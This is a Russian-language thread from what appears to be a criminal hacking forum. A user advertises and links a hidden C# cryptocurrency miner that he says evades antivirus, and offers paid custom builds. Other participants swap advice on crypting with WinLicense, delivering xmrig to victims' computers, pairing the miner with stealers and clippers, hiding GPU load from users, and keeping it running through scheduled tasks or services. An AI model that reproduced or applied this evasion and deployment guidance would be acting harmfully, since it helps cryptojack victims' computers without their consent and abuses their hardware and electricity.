C# Майнер, полный FUD в скантайме и хороший обход рантайм детектов.(V2)

[ViCode]

Это вторая версия скрытого майнера на C#, первая тут: https://xss.pro/threads/32232/
Переписан код, лучше адаптирован.
Майнит на всех доступных GPU и CPU

Вес тела: 145кб в основном из за библиотеки SharpZipLib без нее 12кб, можно ее и подгружать отдельно. Кому как.

На момент поста темы:

Сборка под ключ в jabber 20$: vicode@thesecure.at (плюшки в коде прилагаются )
Спасибки сюда) BTC: 1KHjpcgT3F12AdLJLNKUb8Mwvemqk74aBr

Желательно юзать прокси xmrig.

ViMine.zip (2.24MB) - SendSpace.com

Send, Receive, Track & Share Your Big Files with SendSpace file sharing!

www.sendspace.com

Или

ViMine.zip (2.24MB) - SendSpace.com

Send, Receive, Track & Share Your Big Files with SendSpace file sharing!

www.sendspace.com

Личных нет. не просите.

 

[Paramedic]

тс, я конечно извиняюсь, но можно подробнее простному смертному о обходе рантайм детектов? сам процесс майнинга палится большинством аверов.

 

[ViCode]

тс, я конечно извиняюсь, но можно подробнее простному смертному о обходе рантайм детектов? сам процесс майнинга палится большинством аверов.

Это не статья. Просто сурсы. Я хотел разобрать данный код в статье и да же создал голосование, но эти сурсы уже проиграли https://xss.pro/threads/33440/ увы нет желания и времени расписывать.

 

[Paramedic]

Это не статья. Просто сурсы. Я хотел разобрать данный код в статье и да же создал голосование, но эти сурсы уже проиграли https://xss.pro/threads/33440/ увы нет желания и времени расписывать.

да причём тут это. можешь в двух словах, техническим языком. мне просто интересно, как можно обойти рантайм, используя чистый xmrig.

 

[ViCode]

да причём тут это. можешь в двух словах, техническим языком. мне просто интересно, как можно обойти рантайм, используя чистый xmrig.

При любом раскале их надо криптовать или хотя бы накрывать протектором. Например этим я добиваюсь либо фуда либо 1-2 детекта когда как: https://xss.pro/threads/32446/ и на крипт не трачусь.

Суть обхода рантайма в запуске xmrig и их доставки на пк жертвы.
Последнее время сам удивляюсь как я с WinLicense добиваюсь постоянно полного фуда на x64 CPU, при том что все почти по дефлоту. и кстать xmrig под amd так же ахеренно поддается крипту через WinLicense. Если нудно посидеть 20-30 минут можно фуд полный получить.

 

[Paramedic]

При любом раскале их надо криптовать или хотя бы накрывать протектором. Например этим я добиваюсь либо фуда либо 1-2 детекта когда как: https://xss.pro/threads/32446/ и на крипт не трачусь.

Суть обхода рантайма в запуске xmrig и их доставления на пк жертвы.

рантайм не закриптуешь. крипт спасает только от скантайма. я говорю о рантайме xmrig. про то, что у самого дроппера относительно чистый рантайм - я верю, этого не сложно добиться.

 

[ViCode]

рантайм не закриптуешь. крипт спасает только от скантайма. я говорю о рантайме xmrig. про то, что у самого дроппера относительно чистый рантайм - я верю, этого не сложно добиться.

Согласен. Рантайм детект уже готовых xmrig ты и сам можешь проверить) они в пабе. Смысл о них писать. Майнер использует xmrig и это его главная зависимость (относительно .Net)/

Для паблика и да же привата это лучшее что может быть на C# на данный момент с использованием xmrig)
100 ботов микса без снг на пике: 5.45 KH/s после прогруза

 

[ViCode]

п/с Я отказался от любимого nanopool и перешел на hashvault всем советую не нарадуюсь. использую обычный дедик 2012r2 с проксированием.
Хороший пассив если грузишь стиллер + клиппер еще и майнер вешаешь.
Держу мощь в 20 kh/s не меньше, на сигареты, пивас, в день хватает с полна.
От nanopool отвалы постоянные уже достали, то таймаут на проксях висит пол дня...хотя бана нет. Хер пойми его. на hashvault прет и прет скорость. Все как надо.

 

[QweRR]

ViCode как всегда красавчик, жду статью (хоть и внеконкурсную) про крипт.

 

[timbo]

после форка монеро,эти исходники будут работать?просто все изменилось в xmrige

 

[ViCode]

после форка монеро,эти исходники будут работать?просто все изменилось в xmrige

Будут, они запускают XMRig параметры так же можно дать правильные.

 

[BaPaTok]

Будут, они запускают XMRig параметры так же можно дать правильные.

После форка теперь на видеокартах не актуально майнить монеро, так что наверное код с майнером для видюх лучше вырезать, дабы убрать лишнее палево на ПК.

 

[ViCode]

После форка теперь на видеокартах не актуально майнить монеро, так что наверное код с майнером для видюх лучше вырезать, дабы убрать лишнее палево на ПК.

Это тело майнера можно использовать не только для монеро)

 

[timbo]

Будут, они запускают XMRig параметры так же можно дать правильные.

а что добавлять в архив amd.y ?ведь теперь только xmrig для cpu и xmrig-cuda остались?

 

[BaPaTok]

а что добавлять в архив amd.y ?ведь теперь только xmrig для cpu и xmrig-cuda остались?

xmrig теперь универсальный 2в1, и для cpu и для gpu. И кстати, с другими расширениями, кроме как amd\cpu.zip не распаковывает архив, во всякому случае в первой версии этого майнера и + там ошибка в коде, не стартует сразу после скачивания и распаковки. Так что, набиваем посты для этой версии.
UPD: А не, извиняюсь, чето я попутал, там же CUDA отдельный майнер.

 

[timbo]

xmrig теперь универсальный 2в1, и для cpu и для gpu. И кстати, с другими расширениями, кроме как amd\cpu.zip не распаковывает архив, во всякому случае в первой версии этого майнера и + там ошибка в коде, не стартует сразу после скачивания и распаковки. Так что, набиваем посты для этой версии.
UPD: А не, извиняюсь, чето я попутал, там же CUDA отдельный майнер.

тоесть архив amd не заливать вообще на хост?

вот в этих настройках что касается amd надо что то менять?

"opencl": {
"enabled": false,
"cache": true,
"loader": null,
"platform": "AMD",
"cn/0": false,
"cn-lite/0": false
},
"cuda": {
"enabled": false,
"loader": null,
"nvml": true,
"cn/0": false,
"cn-lite/0": false

 

[BaPaTok]

тоесть архив amd не заливать вообще на хост?

вот в этих настройках что касается amd надо что то менять?

"opencl": {
"enabled": false,
"cache": true,
"loader": null,
"platform": "AMD",
"cn/0": false,
"cn-lite/0": false
},
"cuda": {
"enabled": false,
"loader": null,
"nvml": true,
"cn/0": false,
"cn-lite/0": false

наверное да, надо с "enabled": false, указать "enabled": true, но я точно не знаю, потому что майню тока на процах, поскольку, во первых, майнить после форка монеро на видюхах это идиотизм, слышал, что GTX 1080 выдает столько же Хэшей как проц i3 6го поколения, а во-вторых, майнинг на видюхах всегда сопровождается дикими фризами, что юзер сразу палит и ищет проблему.

 

[timbo]

наверное да, надо с "enabled": false, указать "enabled": true, но я точно не знаю, потому что майню тока на процах, поскольку, во первых, майнить после форка монеро на видюхах это идиотизм, слышал, что GTX 1080 выдает столько же Хэшей как проц i3 6го поколения, а во-вторых, майнинг на видюхах всегда сопровождается дикими фризами, что юзер сразу палит и ищет проблему.

да я настраиваю на всякий случай и на видеокарты заодно!

 

[timbo]

Это тело майнера можно использовать не только для монеро)

Вообщем файл скачивает с хоста,но не распаковывает,по умолчанию формат файла .y поменял на .zip тоже не распаковывает?в чем может быть проблема?

 

[BaPaTok]

Вообщем файл скачивает с хоста,но не распаковывает,по умолчанию формат файла .y поменял на .zip тоже не распаковывает?в чем может быть проблема?

у меня распаковывает, видимо библиотеки Fody и ZipLib удалил из проекта, вес файла должен быть примерно140кб, либо 10кб, но запуск вместе с dll этих либ. У меня была проблема, что после распаковки процесс остается висеть и после запуска созданной им задачи(спустя 1мин), майнер запускается в отдельном процессе от runtimebroker и при открытии диспетчера задач не срабатывает отключение.(kill process). В общем, пока не знаю, либо код кривой либо руки : ). Но я сейчас мучу урезанную версию этого майнера онли цпу 64-bit и запускаться будет через службу типа nssm, а не планировщик задач.